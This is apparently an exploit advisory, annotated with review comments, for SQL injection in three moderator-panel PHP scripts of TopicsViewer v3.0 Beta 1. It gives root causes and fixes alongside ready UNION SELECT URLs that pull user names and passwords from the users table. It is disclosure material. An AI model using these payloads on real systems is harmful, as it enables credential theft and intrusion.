
TopicsViewer SQL Injection Vulnerability

Author: jsass , Published: 05-03-2014
  ####################################################################
Exploit: TopicsViewer SQL Injection Vulnerability
Author: jsass
Contact Twitter: @Kwsecurity
Script: http://www.topicsviewer.com/
version: v 3.0 Beta 1
####################################################################
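SQL INJECTION

In each of the three modcp/ scripts below, request data is placed directly into the SQL string without validation, escaping, or parameter binding.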

(1)

modcp/edit_note.php

//////////////////////////////////
// Excerpt from modcp/edit_note.php; the enclosing if-block continues past this listing.
// The branch runs whenever an `id` query-string parameter is present; isset() checks
// presence only and does not constrain the value to a number.
// NOTE(review): no access check is visible in this excerpt -- confirm the modcp pages
// enforce moderator authentication before this query is reached.
if(isset ($_GET['id']))
{
// The title literal is mis-encoded on this page (looks like text from a legacy code page); kept as-is.
$title="ÊÚÏíá ãáÇÍÙå";
cp_title_bar ($title);
echo"<p>";
//--- Query ---//
// Root cause: $_GET[id] is interpolated into the SQL text unquoted, with no integer
// validation or escaping, so the request value becomes part of the statement itself.
// Fix: reject non-numeric ids (e.g. ctype_digit() or an (int) cast) and pass the value
// as a bound parameter of a prepared statement (PDO or mysqli) instead of building the string.
$sql_q = "select * from notes where n_id = $_GET[id]";
// The return value is never checked and `@` hides the warnings raised when the query
// fails, so a broken or tampered statement produces no visible error here.
// The mysql_* extension used below was removed in PHP 7.0.
$result_q = @mysql_query ($sql_q);
$note = @mysql_fetch_array ($result_q);
////////////////////////////////////
http://localhost/tp/upload/modcp/edit_note.php?id=1%20UNION%20SELECT%201,2,GROUP_concat%28u_name,0x3a,u_password%29,4,5+from%20users--%20-


(2)

modcp/main.php



/////////////////////////////////////////
// Excerpt from modcp/main.php; the enclosing if-block continues past this listing.
// This branch runs when the POST field `note` is NOT set. The code that handles a
// submitted `note` value is not part of this excerpt.
// The unquoted key in $_POST[note] is read as a constant outside a string; PHP 8 raises
// an Error for an undefined constant, so the key should be written 'note'.
if (!isset ($_POST[note]))
{
// The title literal is mis-encoded on this page (looks like text from a legacy code page); kept as-is.
$title="ãáÇÍÙÇÊ ÇáãÔÑÝ";
open_a_table ($title);


// Root cause: the `mod` cookie is client-supplied and is placed inside a quoted SQL
// string without escaping, so a quote character in the cookie ends the literal.
// The same cookie also selects which user's row is read, i.e. identity is taken from
// a value the client controls.
// NOTE(review): whether $_SESSION[mod] can carry attacker-influenced text depends on
// where it is assigned, which this excerpt does not show.
// Fix: take the moderator name from the server-side session only and bind it as a
// parameter of a prepared statement (PDO or mysqli).
$sql_note = "select u_msg from users where u_name = '$_COOKIE[mod]' or u_name = '$_SESSION[mod]' ;";
// The return value is never checked and `@` hides the warnings raised on failure.
// The mysql_* extension used below was removed in PHP 7.0.
$res_note = @mysql_query ($sql_note);
$note = @mysql_fetch_array ($res_note);
// Same bare-constant key issue as above: should be $note['u_msg'].
$u_msg = $note[u_msg];
////////////////////////////////
http://localhost/tp/upload/modcp/main.php?op=home
post
note=1(injection)


(3)

modcp/rmv_topic.php

////////////////////////////////////
// Excerpt from modcp/rmv_topic.php; both if-blocks continue past this listing.
// NOTE(review): the file name suggests a topic-removal flow, but the removal itself
// is not shown here -- confirm what runs after the lookup.
if(isset ($_GET['id']))

{
// isset()/empty() only establish that a non-empty value was sent; neither check
// restricts `id` to digits.
if (!empty ($_GET['id']))
{


// Root cause: $_GET[id] is interpolated into the SQL text unquoted, with no integer
// validation or escaping, so the request value becomes part of the statement itself.
// Fix: reject non-numeric ids (e.g. ctype_digit() or an (int) cast) and pass the value
// as a bound parameter of a prepared statement (PDO or mysqli).
$sql = "select * from topics where t_id = $_GET[id] LIMIT 1 ;";
// The query result is used without checking for failure, and `@` hides the resulting warnings.
// The mysql_* extension used below was removed in PHP 7.0.
$result = @mysql_query ($sql);
$topic = @mysql_fetch_array ($result);
// Row count of the lookup; presumably used further down to confirm the topic exists (not shown).
$verify = @mysql_num_rows ($result);

http://localhost/tp/upload/modcp/rmv_topic.php?id=1%20%20UNION%20SELECT%201,GROUP_concat%28u_name,0x3a,u_password%29,3,4,5,6,7,8,9,10,11,12,13,14+FROM+users--%20-

/////////////////////////////////////////
